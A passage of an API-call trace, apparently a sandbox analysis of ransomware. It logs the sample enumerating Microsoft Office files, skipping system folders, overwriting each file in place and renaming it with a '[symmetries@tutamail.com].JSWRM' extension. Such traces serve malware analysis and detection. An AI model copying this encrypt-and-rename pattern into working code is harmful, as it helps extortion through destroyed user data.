(HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0112.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0112.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0112.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.617] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\outlookmui.msi.16_outlookmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\outlookmui.msi.16_outlookmui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\outlookmui.msi.16_outlookmui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\outlookmui.msi.16_outlookmui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0112.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0112.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0112.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.618] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9888767, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9888767, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9888767, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12b8e, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="powerpointmui.msi.16_powerpointmui.mcxml", cAlternateFileName="POWERP~1.MCX")) returned 1 [0112.618] lstrcmpiW (lpString1="powerpointmui.msi.16_powerpointmui.mcxml", lpString2=".") returned 1 [0112.618] lstrcmpiW (lpString1="powerpointmui.msi.16_powerpointmui.mcxml", lpString2="..") returned 1 [0112.618] lstrcmpiW (lpString1="powerpointmui.msi.16_powerpointmui.mcxml", lpString2="...") returned 1 [0112.618] lstrcmpiW (lpString1="powerpointmui.msi.16_powerpointmui.mcxml", lpString2="windows") returned -1 [0112.619] lstrcmpiW (lpString1="powerpointmui.msi.16_powerpointmui.mcxml", lpString2="recovery") returned -1 [0112.619] lstrcmpiW (lpString1="powerpointmui.msi.16_powerpointmui.mcxml", lpString2="perflogs") returned 1 [0112.619] lstrcmpiW (lpString1="powerpointmui.msi.16_powerpointmui.mcxml", lpString2="documents and settings") returned 1 [0112.619] lstrcmpiW (lpString1="powerpointmui.msi.16_powerpointmui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.619] lstrcmpiW (lpString1="powerpointmui.msi.16_powerpointmui.mcxml", lpString2="system volume information") returned -1 [0112.619] lstrcmpiW (lpString1="powerpointmui.msi.16_powerpointmui.mcxml", lpString2="msocache") returned 1 [0112.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0112.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="powerpointmui.msi.16_powerpointmui.mcxml", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0112.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="powerpointmui.msi.16_powerpointmui.mcxml", cchWideChar=40, lpMultiByteStr=0x22d0a0, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powerpointmui.msi.16_powerpointmui.mcxml", lpUsedDefaultChar=0x0) returned 40 [0112.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0112.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0112.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="powerpointmui.msi.16_powerpointmui.mcxml", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0112.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="powerpointmui.msi.16_powerpointmui.mcxml", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powerpointmui.msi.16_powerpointmui.mcxml", lpUsedDefaultChar=0x0) returned 40 [0112.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0112.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0112.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0112.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0112.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\powerpointmui.msi.16_powerpointmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\powerpointmui.msi.16_powerpointmui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.620] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=76686) returned 1 [0112.620] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12b80) returned 0x24c1d0 [0112.620] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x12b80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x12b80, lpOverlapped=0x0) returned 1 [0112.627] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.627] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x12b80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x12b80, lpOverlapped=0x0) returned 1 [0112.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.628] CloseHandle (hObject=0x238) returned 1 [0112.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0112.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0112.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0112.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0112.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0112.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0112.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0112.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0112.629] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\powerpointmui.msi.16_powerpointmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\powerpointmui.msi.16_powerpointmui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\powerpointmui.msi.16_powerpointmui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\powerpointmui.msi.16_powerpointmui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0112.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0112.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0112.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.630] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b8c7ea5, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b8c7ea5, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b8c7ea5, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x1a4dc, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="projectmui.msi.16_projectmui.mcxml", cAlternateFileName="PROJEC~1.MCX")) returned 1 [0112.630] lstrcmpiW (lpString1="projectmui.msi.16_projectmui.mcxml", lpString2=".") returned 1 [0112.630] lstrcmpiW (lpString1="projectmui.msi.16_projectmui.mcxml", lpString2="..") returned 1 [0112.630] lstrcmpiW (lpString1="projectmui.msi.16_projectmui.mcxml", lpString2="...") returned 1 [0112.630] lstrcmpiW (lpString1="projectmui.msi.16_projectmui.mcxml", lpString2="windows") returned -1 [0112.630] lstrcmpiW (lpString1="projectmui.msi.16_projectmui.mcxml", lpString2="recovery") returned -1 [0112.630] lstrcmpiW (lpString1="projectmui.msi.16_projectmui.mcxml", lpString2="perflogs") returned 1 [0112.630] lstrcmpiW (lpString1="projectmui.msi.16_projectmui.mcxml", lpString2="documents and settings") returned 1 [0112.630] lstrcmpiW (lpString1="projectmui.msi.16_projectmui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.630] lstrcmpiW (lpString1="projectmui.msi.16_projectmui.mcxml", lpString2="system volume information") returned -1 [0112.630] lstrcmpiW (lpString1="projectmui.msi.16_projectmui.mcxml", lpString2="msocache") returned 1 [0112.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0112.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="projectmui.msi.16_projectmui.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0112.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="projectmui.msi.16_projectmui.mcxml", cchWideChar=34, lpMultiByteStr=0x22ce70, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="projectmui.msi.16_projectmui.mcxml", lpUsedDefaultChar=0x0) returned 34 [0112.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0112.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0112.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="projectmui.msi.16_projectmui.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0112.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="projectmui.msi.16_projectmui.mcxml", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="projectmui.msi.16_projectmui.mcxml", lpUsedDefaultChar=0x0) returned 34 [0112.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0112.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0112.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0112.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0112.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\projectmui.msi.16_projectmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\projectmui.msi.16_projectmui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.734] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=107740) returned 1 [0112.734] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a4d0) returned 0x24c1d0 [0112.735] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1a4d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1a4d0, lpOverlapped=0x0) returned 1 [0112.744] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.744] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1a4d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1a4d0, lpOverlapped=0x0) returned 1 [0112.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.746] CloseHandle (hObject=0x238) returned 1 [0112.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0112.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0112.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0112.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0112.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0112.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0112.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.746] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\projectmui.msi.16_projectmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\projectmui.msi.16_projectmui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\projectmui.msi.16_projectmui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\projectmui.msi.16_projectmui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0112.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0112.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0112.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.748] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x99473dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99473dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x996d62b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11094, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Proof.Culture.msi.16_proof.mcxml", cAlternateFileName="PROOFC~1.MCX")) returned 1 [0112.748] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2=".") returned 1 [0112.748] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="..") returned 1 [0112.748] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="...") returned 1 [0112.748] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="windows") returned -1 [0112.748] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="recovery") returned -1 [0112.748] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="perflogs") returned 1 [0112.748] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="documents and settings") returned 1 [0112.748] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.749] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="system volume information") returned -1 [0112.749] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="msocache") returned 1 [0112.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0112.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Proof.Culture.msi.16_proof.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Proof.Culture.msi.16_proof.mcxml", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.Culture.msi.16_proof.mcxml", lpUsedDefaultChar=0x0) returned 32 [0112.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0112.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0112.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Proof.Culture.msi.16_proof.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Proof.Culture.msi.16_proof.mcxml", cchWideChar=32, lpMultiByteStr=0x22d0d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.Culture.msi.16_proof.mcxml", lpUsedDefaultChar=0x0) returned 32 [0112.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0112.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0112.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0112.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0112.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\Proof.Culture.msi.16_proof.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\proof.culture.msi.16_proof.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.750] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=69780) returned 1 [0112.750] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11090) returned 0x24c1d0 [0112.751] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x11090, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x11090, lpOverlapped=0x0) returned 1 [0112.758] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.758] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x11090, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x11090, lpOverlapped=0x0) returned 1 [0112.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.759] CloseHandle (hObject=0x238) returned 1 [0112.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0112.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0112.759] HeapFree (in: hHeap=0x1e0000, 